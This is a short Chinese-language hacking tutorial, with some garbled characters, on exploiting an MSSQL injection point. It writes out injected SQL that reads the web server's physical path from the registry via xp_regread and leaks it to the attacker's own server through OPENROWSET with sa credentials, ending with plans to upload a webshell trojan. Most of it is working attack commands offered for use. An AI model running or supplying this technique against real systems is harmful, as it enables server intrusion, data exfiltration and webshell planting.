滲透中用openrowset搞shell的方法 
得到SQL注入點(diǎn),首先想到的是BACKUP WEBSHELL,扔在NB里跑一圈,發(fā)現(xiàn)屏蔽了SQL錯(cuò)誤信息,得不到物理路徑,那還寫個(gè)PP馬了.
聯(lián)想到一個(gè)權(quán)限不是很高的命令openrowset,進(jìn)行跨庫服務(wù)器查詢,就是把一個(gè)SQL命令發(fā)送到遠(yuǎn)程數(shù)據(jù)庫,然后看返回的結(jié)果,但是要啟動(dòng)事件跟蹤!我們可以把網(wǎng)站信息寫入數(shù)據(jù)庫,然后%$^%$@#$@^%$~
首先在自己機(jī)器建立SQL數(shù)據(jù)庫 

然后在對(duì)方機(jī)器上建立個(gè)表 create table [dbo].[fenggou]([cha8][char](255))--

在對(duì)方執(zhí)行 DECLARE @result varchar(255) exec master.dbo.xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CONTROLSet001\Services\W3SVC\Parameters\Virtual Roots', '/' ,@result output insert into fenggou (cha8) values('select a.* FROM OPENROWSET(''SQLOLEDB'',''自己的IP'';''sa'';''你的密碼'', ''select * FROM pubs.dbo.authors where au_fname=''''' + @result + ''''''')AS a');--

這樣fenggou這個(gè)表里就會(huì)有這樣一條記錄select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

不用說,''D:\WEB"就是從注冊(cè)表里讀出的物理路徑拉.然后執(zhí)行DECLARE @a1 char(255) set @a1=(select cha8 FROM fenggou) exec (@a1);--

等于執(zhí)行了select a.* FROM OPENROWSET('SQLOLEDB','自己的IP';'sa';'你的密碼', 'select * FROM pubs.dbo.authors where au_fname=''D:\WEB,,1''')AS a

OK,這時(shí)你在你機(jī)器上SQL事件追蹤器上就會(huì)顯示select * FROM pubs.dbo.authors where au_fname='D:\WEB,,1' 
哇 哈哈哈哈哈 物理路徑到手了 寫小馬傳大馬吧~